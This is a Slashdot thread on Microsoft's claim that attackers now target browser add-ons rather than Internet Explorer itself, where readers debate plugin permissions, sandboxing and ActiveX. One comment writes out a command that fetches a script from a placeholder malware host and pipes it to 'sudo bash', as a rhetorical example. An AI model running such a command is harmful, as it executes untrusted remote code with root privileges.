Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Microsoft Blames Add-Ons For Browser Woes

timothy posted more than 5 years ago | from the sounds-semi-reasonable dept.

Internet Explorer 307

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"

cancel ×

307 comments

Duh (5, Insightful)

Drinking Bleach (975757) | more than 5 years ago | (#25850749)

Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

!news

I'll still blame you for everything else. (5, Insightful)

retech (1228598) | more than 5 years ago | (#25850759)

Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've miss some.

Re:I'll still blame you for everything else. (5, Informative)

stewbacca (1033764) | more than 5 years ago | (#25850915)

You forgot the "embedded video frequently doesn't play even though it's a Microsoft codec" bit.

Re:I'll still blame you for everything else. (5, Funny)

gmack (197796) | more than 5 years ago | (#25851555)

That would be an add-on problem.

Re:I'll still blame you for everything else. (3, Interesting)

xonar (1069832) | more than 5 years ago | (#25851767)

A microsoft addon, divx anyone?

Re:I'll still blame you for everything else. (2, Insightful)

Kamokazi (1080091) | more than 5 years ago | (#25851937)

To be fair to Microsoft (And a disclaimer, I primarily use Opera myself):

-I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot.

-IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out.

-Sluggish...compared to FF3 and Opera. But it was faster than FF2 for several different langages...so then FF2 was also sluggish, by your standards.

-Bloated? How? I really don't see any bloat compared to other browsers.

-What features do you expect from it out of the box? Seems to do about the same as the others, plus or minus some minor stuff.

(Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

Re:I'll still blame you for everything else. (1)

mal3 (59208) | more than 5 years ago | (#25852019)

Just replying to undo accidental troll moderation

Permissions (5, Insightful)

gurps_npc (621217) | more than 5 years ago | (#25850773)

And if the Add on's were given far more permission than they actually need? If the browser works right, then the damage a poorly written add on can do should be minimal.

Re:Permissions (4, Interesting)

TheRaven64 (641858) | more than 5 years ago | (#25850861)

Ideally, most of these plugins should be setuid as nobody, run in a separate process and have their windows reparented into the browser window. I don't know of any *NIX systems that actually do this for plugins. I believe Chrome does something similar on Windows, but IE does not (although it runs the entire browser as a less-privileged process on Vista).

Re:Permissions (5, Informative)

Anonymous Coward | more than 5 years ago | (#25851129)

Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.

Re:Permissions (2, Informative)

ShawnCplus (1083617) | more than 5 years ago | (#25851389)

That's gotta be new. Every time I've gotten within 100 yards of a site with flash Konquerer crashed.

What about kde-gnash? (4, Informative)

mangu (126918) | more than 5 years ago | (#25851747)

There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was.

You are right that konqueror does not crash the whole computer, but that's still very far from the desired result.

Re:Permissions (1)

PopeRatzo (965947) | more than 5 years ago | (#25851801)

Konqueror runs flash elements and java applets

Except when it doesn't.

Re:Permissions (5, Insightful)

geirnord (150896) | more than 5 years ago | (#25850863)

I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

Re:Permissions (2, Informative)

soniCron88 (870042) | more than 5 years ago | (#25850989)

Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

Was there a time when plug-ins couldn't have access to the harddrive?

Re:Permissions (4, Interesting)

ya really (1257084) | more than 5 years ago | (#25851259)

IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?

Re:Permissions (4, Interesting)

gurps_npc (621217) | more than 5 years ago | (#25851567)

Because they made it easy to write shoddy code. If you make people go through hoops to get the good stuff, then they get lazy and accept the minimum. To use a real world analogy, no, you don't need to have the same key start the car as open your front door, your mail box, and your office. If you insist on selling a car, house lock, mailbox and the office, then don't also make them use the same key for 'convience'.

Re:Permissions (4, Interesting)

catchblue22 (1004569) | more than 5 years ago | (#25851837)

IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?

Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly.

I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious.

Re:Permissions (1)

aztektum (170569) | more than 5 years ago | (#25851917)

If Microsoft puts out an OS which allows people to write third party software for it, don't they have some obligation to make sure their OS can't be compromised by third parties?

Re:Permissions (1)

catchblue22 (1004569) | more than 5 years ago | (#25851649)

Microsoft creates the environment in which these add-ons run. If that environment is too permissive, allowing add-ons to reach deep into your system, then this is still microsoft's fault. They should only allow the add-ons to play in a very small sandbox with high walls.

Re:Permissions (1)

orclevegam (940336) | more than 5 years ago | (#25852057)

Of course, the most massively abused addon ever is ActiveX. Also, when the "addon" ships with the browser, you shouldn't really be able to call it an addon anymore.

Firefox has the right idea with extensions, they're relatively small, lightweight, incredibly flexible, but also easy to corral and sandbox. Since most things you want to do can be handled by extensions, there's really very little reason to use plugins in Firefox outside of things like flash, pdf, or embedding mplayer/vlc/media player of choice. Over on the IE side of things however, anything you want to change must be done via a plugin, which means running a binary blob and having to trust it not to do something nasty.

I've always said this. (4, Insightful)

bigstrat2003 (1058574) | more than 5 years ago | (#25850775)

The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

Re:I've always said this. (3, Informative)

Anonymous Coward | more than 5 years ago | (#25850847)

And if your browser isn't full of security holes, it doesn't matter which sites you go to.

I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses.

Re:I've always said this. (2, Insightful)

SQLGuru (980662) | more than 5 years ago | (#25850981)

How about a car analogy?

If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.

Layne

Re:I've always said this. (0, Offtopic)

morgan_greywolf (835522) | more than 5 years ago | (#25851363)

Until the thugs from Liberty City show up in your hometown's Main Street and then you get jacked by total surprise.

Re:I've always said this. (4, Informative)

bigstrat2003 (1058574) | more than 5 years ago | (#25851461)

This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy.

Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners.

Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with.

And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training.

This is too fun (5, Funny)

Anonymous Coward | more than 5 years ago | (#25851695)

I like the sex analogies; I think this should be a new standard for /.

Yours has some good points but:

Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.

Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?

Re:I've always said this. (1)

blueskies (525815) | more than 5 years ago | (#25851721)

Except that large numbers of people don't go around stealth-infecting people on purpose to infect others.

With automated botnets scanning and attacking your legitimate sites are getting exploited Large scale sql insertion attack [computerworld.com] .

You could use something like siteadvisor.com [siteadvisor.com] to help protect yourself, if you aren't afraid of using something owned by McAfee. It doesn't catch exploited sites instantaneously, but it helps you on the user training front by marking large swatch of the internet as unsafe. It definitely catches a LOT of nasty sites that your grandmother might accidentally click on.

Re:I've always said this. (1)

hyades1 (1149581) | more than 5 years ago | (#25851133)

I agree completely. My antivirus program says everything is fine, and so does my spyware killer. The only thing I can't quite figure out is that since I started on-line banking, it doesn't matter how much money I put in my account, the balance won't go above $5,000. :)

Re:I've always said this. (1)

DoofusOfDeath (636671) | more than 5 years ago | (#25851241)

... and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

How do you know?

Re:I've always said this. (1)

VeNoM0619 (1058216) | more than 5 years ago | (#25851285)

Because after he got his virus, he became afraid of the internet and didn't visit any sites up until Chromes recent release.

Welcome to the internet, I'll show you around.

Re:I've always said this. (1)

bigstrat2003 (1058574) | more than 5 years ago | (#25851479)

Because I monitor my computer's behavior and health? I'm not a babe-in-the-woods clueless user, here, I keep an eye on how my PC is doing. It's technically possible that I could have got some sort of invisible, undetectable malware, but if we take it to that level of ridiculosity, then no one knows if their computer is clean.

Re:I've always said this. (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25851657)

no one knows if their computer is clean

BINGO, motherfucker.

Re:I've always said this. (0)

Anonymous Coward | more than 5 years ago | (#25851715)

....I'm not a babe-in-the-woods clueless user, here....

Hmm, your original post said:

I used IE from the day I started using the internet until the day Chrome was released

Yeah, not clueless. Not clueless at all.

Re:I've always said this. (0)

Anonymous Coward | more than 5 years ago | (#25851353)

So you joined the intertube forums just so you to try the new chrome pipes?

Re:I've always said this. (5, Insightful)

Sloppy (14984) | more than 5 years ago | (#25851393)

The biggest part of internet security is paying attention to where you go.

I would agree with you, if "going" to a malware site meant

curl ftp://malwaresite.com/malware.sh [malwaresite.com] | sudo bash

Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

"Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

Re:I've always said this. (2, Insightful)

joeflies (529536) | more than 5 years ago | (#25851423)

I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent somone from taking over your machine.

You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting mugged. But that doesn't make you mugging-proof.

Re:I've always said this. (1)

bigstrat2003 (1058574) | more than 5 years ago | (#25851505)

I agree, but I did say that the technical side of the issue shouldn't be ignored. Both are important.

Re:I've always said this. (1)

Smauler (915644) | more than 5 years ago | (#25851641)

Meh - I go to all kinds of dodgy sites, and have yet to have a virus. Obviously I get a few warnings, Firefox warns me about some stuff, and I never ever actually run anything from a source I don't trust. My personal opinion is that most people get viruses from emails their friends have sent them, which they click yes to. Vista's UAC is actually pretty useful for me. It rarely pops up when I'm doing normal stuff, and it does stop stuff from running as admin. I used to have antivirus on this box, but I got rid of it because I cannot see how I personally will get a virus in the first place.

Back on topic - I think the major security problem of our time for the general populace is malware misrepresenting itself. Social engineering has always been the best way into any system, if you can get the user to run a program, you don't need to bypass any tough defences. All it takes for a lot of people is a pop-up window saying "Your PC is infected, click here to clean it".

Re:I've always said this. (1)

techno-vampire (666512) | more than 5 years ago | (#25851647)

if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

All men have two heads, but they can only think with one of them at a time. Now, if you're indulging in some "one-handed browsing," how secure your browser is may well be a factor in keeping your computer clean because sites like that are prime grazing ground for malware and trojans and spyware, Oh my!

But remember (5, Insightful)

dedazo (737510) | more than 5 years ago | (#25850789)

If it's Firefox, it's perfectly OK to blame the add-ons.

Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

Re:But remember (0)

Anonymous Coward | more than 5 years ago | (#25850949)

Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

Fixed? Really? Somehow, I doubt [imageshack.us] that they have fixed a whole lot...

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851113)

Wow, that's really bad.

I have seen some decrease in the amount of memory used by 3.x over 2.x, especially when I leave the browser open for days at a time.

On the other hand, 3 does seem to crash more often, at least on me. This [letmegoogl...foryou.com] page will make it crash every single time on this machine, for example.

Re:But remember (1)

Daimanta (1140543) | more than 5 years ago | (#25851189)

"This [letmegoogl...foryou.com] page will make it crash every single time on this machine, for example."

Using 3.1b1 and nothing strange happens. Add-ons: Adblock plus, Noscript(off), fasterfox

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851311)

3.0.4 on Vista here. A bunch of add-ons like AdBlock Plus, Flashblock, Google Toolbar, etc. I didn't try disabling them. I should mention that it works fine on an XP Pro laptop I have sitting here on my desk with 2.x (I forget the exact version), so it might be something about this install. Java is also broken for some reason. Maybe it was the upgrade, instead of just starting from scratch.

Re:But remember (1)

nneonneo (911150) | more than 5 years ago | (#25852055)

3.0.4 on XP, 30+ tabs open (including GMail), 284MB used. I've about a dozen add-ons, including NoScript (currently permitting almost all the open sites), ABP, Firebug, YSlow, Greasemonkey, ...
 
I restart Firefox about as often as I restart XP, which is not very often.

Re:But remember (1)

clone53421 (1310749) | more than 5 years ago | (#25851199)

It didn't crash, and I'm definitely keeping that link! :)

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851263)

Yeah, it's pretty funny. It was doing the rounds the other day.

Works fine on IE as well, which is what I had to use to look at it.

Re:But remember (0)

Anonymous Coward | more than 5 years ago | (#25851281)

Yah, that was exactly what I thought when I snapped that screenshot.

FF 3.0.3 with 4 tabs (Slashdot, Gmail, Mozilla forum, and about:cache) running on a Vista Ultimate x64 box taking 1.5GB of RAM. Yah.

I'm not even going to get started with the widespread problem firefox users report with Youtube videos randomly not playing until you restart the browser. Default reply from the FF folks? "Try running it in safe mode". Seriously.

I went back to IE, which *never* gets anywhere near 1/2 the memory usage of FF3. True, I can't use the Download Statusbar nor Google Redesigned extensions, but I can live without the statusbar and Gmail now has themes.
Everything else just *works*.

Re:But remember (1)

dedazo (737510) | more than 5 years ago | (#25851487)

I wouldn't go back to IE though, not unless there's equivalents to AdBlock, FlashBlock, Google Notebook and CustomizeGoogle that work within the browser and work well. And themes, at least the one I use in Firefox.

Whatever failings FF has, it's still an acceptable trade-off over Internet Explorer as far as I'm concerned.

Re:But remember (1)

PitaBred (632671) | more than 5 years ago | (#25851495)

3.0.4 here, Adblock Plus, Foxmarks, FoxyProxy and User Agent Switcher plugins, and that site works fine. You have something screwed up on your machine.

Car analogy (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#25850797)

If you get late to work...
it's because you woke up late, you lazy a**.
STOP BLAMING THE TRAFFIC!

It's the Network! (1)

qwertphobia (825473) | more than 5 years ago | (#25850857)

Around here, and many other places, I suspect, the generally-accepted practice is to first blame the network when problems arise.

The network usually isn't at fault but we are still forced to jump through hoops before we can tell the user the network is fine, it's their poorly-implemented config/script/filter that caused their problems.

I see this as a similar practice... if some crap comes through the browser, it must be the browser's fault. Nevermind that some toolbar or plugin or other enhacement left a few doors open.

Re:It's the Network! (1)

QuantumRiff (120817) | more than 5 years ago | (#25851063)

Love it when users try to blame their flaky network connections for files getting deleted. They certainly didn't delete the wrong file, their network connection is glitchy and "goes down" all the time, they tell me on their IP phone....

Re:It's the Network! (1)

gbjbaanb (229885) | more than 5 years ago | (#25851723)

I thought the generally accepted practice for MS is to first blame the video driver, and then blame the printer driver. *then* they might look at the problem :)

Mind you, I agree with MS here, the biggest problem with the browser is the add-ins.. ones like SmileyCentral, AdsULike, PhishingToolbar, AntiVirusCheckPro, and NoSpamHonestNoReally.

Add on architecture? (3, Insightful)

tjstork (137384) | more than 5 years ago | (#25850875)

Microsoft made add-ons essentially super-user in the browser space, and now they complain about add-ons being ill-behaved? If you don't want kids to bang their heads on your playground, perhaps design it better?

Re:Add on architecture? (1)

geirnord (150896) | more than 5 years ago | (#25850927)

Flamebait, if it weren't true....

Bullshit. Plain utter bullshit. (4, Insightful)

syousef (465911) | more than 5 years ago | (#25850899)

Many non-power-users don't use addons at all.

If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

Re:Bullshit. Plain utter bullshit. (4, Insightful)

EvanED (569694) | more than 5 years ago | (#25850975)

Many non-power-users don't use addons at all.

And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

Re:Bullshit. Plain utter bullshit. (2, Informative)

nschubach (922175) | more than 5 years ago | (#25851315)

Yes, I'm still trying to figure out how to teach my Mom that she doesn't need EVERY toolbar in existence.

Re:Bullshit. Plain utter bullshit. (0)

Anonymous Coward | more than 5 years ago | (#25851901)

Gawd I hate those, I couldn't even figure out how to get Yahoo's to uninstall (back when I did use IE). That was the first thing that brought me to mozilla was the absence of that dang yahoo toolbar.

Re:Bullshit. Plain utter bullshit. (4, Insightful)

athakur999 (44340) | more than 5 years ago | (#25851019)

Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

Re:Bullshit. Plain utter bullshit. (1)

goofballs (585077) | more than 5 years ago | (#25851025)

yeah, bullshit is right- bullshit power users don't use add-ons; look at the examples given in the article and the summary- flash, pdf, and quicktime? unless you categorize all the youtube users as 'techies', eh?

Re:Bullshit. Plain utter bullshit. (1)

Drinking Bleach (975757) | more than 5 years ago | (#25851045)

I'm going to remember that next time I have to fix someone's computer and IE has 10 bullshit toolbars, of which 9 of them are malware.

Re:Bullshit. Plain utter bullshit. (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25851065)

Not knowingly you mean. Most users who don't know much about computers I find have at least 5 different toolbars from various software vendors including but not limited to yahoo, google and adobe. It seems that every fucking program nowadays has some stupid browser toolbar/addon shit tacked onto it you need to tell the installer to NOT FUCKING INSTALL or it will take over your browser.

Re:Bullshit. Plain utter bullshit. (1)

mcgrew (92797) | more than 5 years ago | (#25851101)

From TFA: The browser is becoming a harder target and there are many more browsers," Lawrence said. "So attackers are targeting add-onsaling from the poor to give to the rich.

But your IE add-on worn't work in Firefox and the Firefox add-on won't work on Opera. How stupid do these people think we are?

He added that attackers are finding add-ons with high market share looking for vulnerabilities and then exploiting every browser through the add-on

Again, that's neither logical nor reasonable. Can anyone point to an add-on that has more users than ANY brand of browser? How many millions of copies of IE were shipped last month?

you could still be at risk if there is a vulnerability in Flask, PDF, QuickTime or another popular add-on

I think they meant "flash", my home browser has no need for PDF, I gave up quicktime years ago (ugh) and the only thing Flash does is try and serve ads. So is this chump saying I can forget about vulnerabilities and just use IE?

Seems to me most of the vulnerabilities I hear about involve Active-X, which is only supported by IE. maybe that's the "addon" he's talking about ;)

Re:Bullshit. Plain utter bullshit. (2, Interesting)

TheRaven64 (641858) | more than 5 years ago | (#25851235)

Can anyone point to an add-on that has more users than ANY brand of browser?

Sun Java? Adobe Flash? Not sure about the former does, but the latter has a much bigger installed-base than IE.

Re:Bullshit. Plain utter bullshit. (2, Informative)

Jamie's Nightmare (1410247) | more than 5 years ago | (#25851293)

Many non-power-users don't use addons at all.

That's incorrect. Most of them install the add-ons without really knowing that they are doing, or don't unchecked the box that says "Install this tool bar you don't want" when installing software.

Re:Bullshit. Plain utter bullshit. (1)

Simon (S2) (600188) | more than 5 years ago | (#25851309)

Many non-power-users don't use addons at all.

Everybody (well, almost of course) has flash installed nowadays.

Re:Bullshit. Plain utter bullshit. (1)

wizkid (13692) | more than 5 years ago | (#25851331)

I'm a power user, and I use add-ons ... Especially noscript. It's really helpful on IE... No wait ... Nevermind on the IE part. I haven't used wine to load IE yet.

Re:Bullshit. Plain utter bullshit. (0)

Anonymous Coward | more than 5 years ago | (#25851445)

A power user who uses IE .. ?! Please, tell me you are joking!

Re:Bullshit. Plain utter bullshit. (1)

clone53421 (1310749) | more than 5 years ago | (#25851671)

Did you miss the part where he said he hadn't loaded IE?

NoScript is a Firefox addon...

Re:Bullshit. Plain utter bullshit. (2, Informative)

clodney (778910) | more than 5 years ago | (#25851357)

I think the article was not referring to addons in the sense that a geek thinks of them - adblock, firebug, noscript, etc.

Instead, they mean the biggies - acrobat, flash, quicktime. Most systems will have some or all of those installed.

Re:Bullshit. Plain utter bullshit. (2, Interesting)

Fujisawa Sensei (207127) | more than 5 years ago | (#25851735)

Many non-power-users don't use addons at all.

If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

Many power-users install only a minimal number of addons to do what we want. Stuff like flash-block along with flash. We don't need a dozen fool-bars or huge numbers of widgets.

Re:Bullshit. Plain utter bullshit. (1)

cpicon92 (1157705) | more than 5 years ago | (#25851963)

Adobe PDF Reader come prepackaged with new dells. I know many a non-techie who had like 18 different toolbars installed too.

Tied down! (2, Insightful)

Anonymous Coward | more than 5 years ago | (#25850955)

It's browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow!

I think they have a point.. (4, Funny)

Anonymous Coward | more than 5 years ago | (#25850985)

With the likes of ActiveX, and Silverlight out there, who could blame IE?

Re:I think they have a point.. (3, Insightful)

Ethanol-fueled (1125189) | more than 5 years ago | (#25851167)

Finally!

28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.

Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

Re:I think they have a point.. (2, Insightful)

bigstrat2003 (1058574) | more than 5 years ago | (#25851717)

Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever.

What A Coincidence! (0, Offtopic)

Wandering Wombat (531833) | more than 5 years ago | (#25851041)

I aren't go after the browser, neither! I can has cheezburger nao?

excuses (1, Insightful)

danielt998 (1348307) | more than 5 years ago | (#25851049)

micosoft are just looking for any excuse to hide the fact that ie is really insecure and crap.

Speaking of add-ons (5, Insightful)

Anonymous Coward | more than 5 years ago | (#25851057)

Would an example of this include the Active X Control you have to install to be able to run Windows Update?

Plugin model (4, Insightful)

Enderandrew (866215) | more than 5 years ago | (#25851197)

Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security?

Take a look at how Chrome handles plugins and then try to pass the buck.

Re:Plugin model (3, Informative)

benjymouse (756774) | more than 5 years ago | (#25851959)

Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on intrinsic level protects against modifications to the file system, registry, network access etc.

Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities.

If a plugin needs more advanced access than what is provided by his broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability)which enabled a security researcher to execute a program on the Vista in the pwn2own contest.

Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adament that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rouge process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs.

Re:Plugin model (0)

Anonymous Coward | more than 5 years ago | (#25852033)

That does not provide more security against a rouge process taking over the machine

I don't know about rouge, but I used to see bleu all the time.

"Mashups" are the biggest problem (0)

Anonymous Coward | more than 5 years ago | (#25851219)

It doesn't matter that you only visit known websites with plugins enabled. These days almost all websites embed content from other servers, in the form of ads, widgets and toolkit scripts. Computer security is ever more resembling biological immune systems instead of the old-fashioned "absolute" security approach. Software isn't written to be secure, systems aren't designed to be correct. It's as if we've accepted that a certain level of infection is unavoidable. That's a dangerous game when pieces of data as little as 16 bytes can totally compromise a system.

Yeah... that's the ticket (1)

Toe, The (545098) | more than 5 years ago | (#25851253)

(Sorry... can't find the video; SNL's crackin' down, I guess. All I got is some transcript [jt.org] .)

But Windows is a security hole platform! (1)

David Gerard (12369) | more than 5 years ago | (#25851391)

After what was expected to be an unusually quiet Patch Tuesday, Microsoft has released eight patches for applications with an insufficient number of security holes [today.com] .

The updates include "critical" patches to Windows Media Player visualisations, Zune player software, that really cute dinosaur cursor and Age Of Empires II. The exploits opened by these patches allow a malicious user to take webcam pictures of your pimply butt, steal your pizza delivery and have sex with your girlfriend. The exploits have already been marketed to the Dark Security market by Microsoft Russia.

"Windows 7 won't be vulnerable!" added marketing marketer Jonathan Ness. "Did we mention how fantastic Windows 7 will be? Also, Vista's pretty good! Really! The London Stock Exchange was probably still on XP!"

Safari 3.2 blames everything but itself (0)

Anonymous Coward | more than 5 years ago | (#25851439)

ActiveX finally on the chopping block? (1)

McNihil (612243) | more than 5 years ago | (#25851509)

Well one can always hope they kill off ActiveX now that everything is "primed" for silverlight... *coug* *cough* ... old tech meet the new tech... at the end of the day same ole same ole.

What better way to get massive adoption of new stuff?

What is needed is better warning messages (1, Interesting)

Anonymous Coward | more than 5 years ago | (#25851573)

I see people trying to install the free "Spyware Removal" and "Registry Scanner" all the time on our Citrix servers. They fail, of course, but it doesn't stop them from trying. And what warning does the OS give you when a site is trying to install something?
A yellow bar that suggest you click here to proceed. It might mention that some content may be harmful.

It should say something like: "This web site is trying to crap on your computer. If you enjoy getting crapped on and ripped off in your personal life, click here to proceed." If they do click, then it should say: "People like you are why syphilis is still a common disease".

No way! (0)

Anonymous Coward | more than 5 years ago | (#25851655)

Add-on's for IE??

Largely yes and largely ignorance (mitigation) (4, Interesting)

betelgeuse68 (230611) | more than 5 years ago | (#25851661)

Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as as "root"!!! ("administrator" in the Windows vernacular)

I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights:

http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=mncol&cdlPid=10835515

The installer will create shortcuts for IE and Fifrefox but if you look carefully it's really a program with the browser .EXE passed as an argument.

Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this.

This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights.

(Some caveats)

This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials).

If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpate.

And finally, to convince yourself the utility does something useful. Go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't.... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario).

Maybe I'll educate some % of the IT world yet...

Respectfully,
-M

What a joke (1, Insightful)

Anonymous Coward | more than 5 years ago | (#25851751)

Yes it's not their fault that Vista was a fuck up. It's not their fault that it takes half an hour to upgrade to IE7.
It's not as if we should care that the Internet is in a dark age for the last 7 years..

browser security - think Opera (1)

sebt (1229910) | more than 5 years ago | (#25851791)

This is another good reason to use the Opera, and one of the key reason that Opera users and devs have been arguing for a very long time against plugins and extensions.

There can be little doubt that Opera is the safest browser out there, particularly if you like to routinely browse questionable websites; while the safe sandbox of userJS, userCSS and widgets in addition to the plethora of out-of-the-box features means that there's very little need for extensions anyway.

Firefox is a great browser, and much more secure than IE, but since its growth in popularity combines with the number of malicious extensions out there it can no longer be considered to be a completely secure browsing environment.

Don't take my word for it, check out Secunia's own advisories.

sebt :)

sandbox (1)

BigJClark (1226554) | more than 5 years ago | (#25851859)


How about sandboxing the entire thing so that no matter what, with the flip of a switch, no writes to the HD are allowed, period (cookies or otherwise, I don't care to be tracked, and can remember more than one complex password). We could call it something scary, like jail. Or chroot jail.

Think about it, next generation. I've given up on the current one.

ABM (2, Insightful)

YetAnotherBob (988800) | more than 5 years ago | (#25851865)

This is marking. Blame ABM, Anybody But Microsoft.

